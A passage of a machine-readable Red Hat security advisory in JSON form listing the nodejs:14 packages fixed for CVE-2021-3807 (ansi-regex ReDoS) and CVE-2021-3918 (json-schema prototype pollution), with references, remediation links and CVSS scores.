"AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3807" }, { "category": "external", "summary": "RHBZ#2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3807", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3807" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807" }, { "category": "external", "summary": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994", "url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994" } ], "release_date": "2021-09-17T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes" }, { "cve": "CVE-2021-3918", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2021-11-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2024702" } ], "notes": [ { "category": "description", "text": "The json-schema Node.JS library was vulnerable to prototype pollution during the validation of a JSON object. An attacker, able to provide a specially crafted JSON file for validation, could use this flaw to modify the behavior of the node program, to, for example, execute arbitrary code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-json-schema: Prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "npm versions 8.0.0 and older provide a vulnerable version of the json-schema library. However, it is currently believed that in the context of npm, it is not possible to take advantage of the vulnerability.\n\nRed Hat Enterprise Linux version 8 and Software Collections provide a vulnerable version of the json-schema library only as embedded in the npm package. As a result, the severity of the incident has been lowered for these 2 products.\n\nRed Hat Quay includes json-schema as a development dependency of quay-registry-container. As a result, the impact rating has been lowered to Moderate.\n\nIn Red Hat OpenShift Container Platform (RHOCP), Red Hat Openshift Data Foundations (ODF), Red Hat distributed tracing, Migration Toolkit for Virtualization (MTV) and Red Hat Advanced Cluster Management for Kubernetes (RHACM) the affected components are behind OpenShift OAuth. This restricts access to the vulnerable json-schema library to authenticated users only, therefore the impact is reduced to Moderate.\n\nIn Red Hat Openshift Data Foundations (ODF) the odf4/mcg-core-rhel8 component has \"Will not fix status\", but starting from ODF 4.11 stream this component contains already patched version of the json-schema library. Earlier version of ODF are already under Maintenance Support phase, hence this vulnerability will not be fixed.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3918" }, { "category": "external", "summary": "RHBZ#2024702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024702" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3918", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3918" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918" } ], "release_date": "2021-10-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", 